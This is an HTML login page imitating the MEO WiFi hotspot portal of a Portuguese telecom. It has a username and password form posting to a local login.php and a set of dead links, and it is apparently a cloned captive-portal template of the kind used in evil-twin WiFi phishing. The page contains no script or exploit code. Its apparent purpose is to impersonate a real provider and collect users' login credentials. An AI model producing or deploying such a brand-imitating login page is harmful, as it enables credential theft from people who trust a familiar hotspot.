<!DOCTYPE html>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<head><title>MEO WiFi</title>

<!--style--><link href="style.css" rel="stylesheet" type="text/css">
    
<style>
@media only screen and (max-width: 500px) {
body{
		margin-top:0;
		margin-botton:0;
		margin-right: 0;
		margin-left: 0;
		background:#333333;	
	}
}

@media only screen and (min-width: 500px) {

	.main{
	background: url('MEO-Wifi-login-cafe-XL.JPG') center no-repeat;
	width:100%;
	height:800px;
	margin-top:-45px;
	}
	body{
		margin-top:0;
		margin-botton:0;
		margin-right: 0;
		margin-left: 0;
	}

	.login{
	position:absolute;
	width:300px;
	height:470px;
	top: 10%;
	left:70%;
	background:#333333;		

	}

	.txt-promo{
	background-color:#000;
	text:#fff;
	}

}

.txt-promo{
	background-color:#000;
	text:#fff;
	}
</style>


</head>
<body cellspacing"0" cellpadding="0">

<div class="top"></div>


<table cellspacing"0" cellpadding="0" bgcolor="#000000" border="0" width="100%" height="70px">
<tr><td align=right><img src="logo_meowifi.png"></td><td width=70%></td></tr>
</table>


<div class="main">
<div class="login">
<br>
<form method="POST" action="login.php">
<table border="0" align="center">

<tr><td align="center"><font size="5" color="white">Ligue-se ao MEO WiFi</font></td></tr>

<tr><td align="center"><br><input class="form-control" id="user" type="text" name="username" placeHolder="User"></td></tr>
<tr><td style="height:5px;"></td><tr>
<tr><td align="center"><input type="password" class="form-control" id="user" name="password" placeHolder="Password"></td></tr>
<tr><td style="height:15px;"></td><tr>


<tr><td align="center"><input id="save_credentials" type="checkbox"><font size="3" color="#ffffff">Lembrar dados de login</font></td></tr>

<tr><td align="center"><font size=3 color=#ffffff>Li e aceito as <a href="#">condi&ccedil;&otilde;es de servi&ccedil;o</a></font></td></tr>

<tr><td style="height:15px;"></td><tr>

<tr><td align=center><input  id="login" class="btn btn-primary btn-wide" type="submit" value="LIGAR"></td></tr>

<tr><td style="height:15px;"></td><tr>
<tr><td style="height:5px;"></td><tr>
<tr><td><font color=#fff>Esqueci-me da <a href=#>password</a></font></td></tr>
<tr><td style="height:5px;"></td><tr>
<tr><td><font color=#fff>Sim, sou cliente MEO e quero <a href=#>registar-me</a></font></td></tr>
<tr><td style="height:5px;"></td><tr>
<tr><td><hr></td></tr>

<tr><td><input type="button" class="btn btn-default btn-wide color="#ffffff" value="COMPRAR VOUCHER"></td></tr>
<tr><td style="height:10px;"></td><tr>
<tr><td><font color=#fff>Quero recuperar <a href=#>voucher</a></font></td></tr>

</table>
</form>
</div>

</div>


<center>

<table cellspacing"0" cellpadding="0" class="txt-promo" border=0 width=100% height=80px>
<tr><td align=right><img class="ic-promo" src="icons-login-wifi.png" alt=""> </td>
<td width=65%> <font color=#fff size=4> &nbsp;MEO Wifi dispon&iacute;vel em mais de 400 mil hotspots em Portugal</font> </td></tr>
</table>
</center>


<br><br>
</body>

</html>
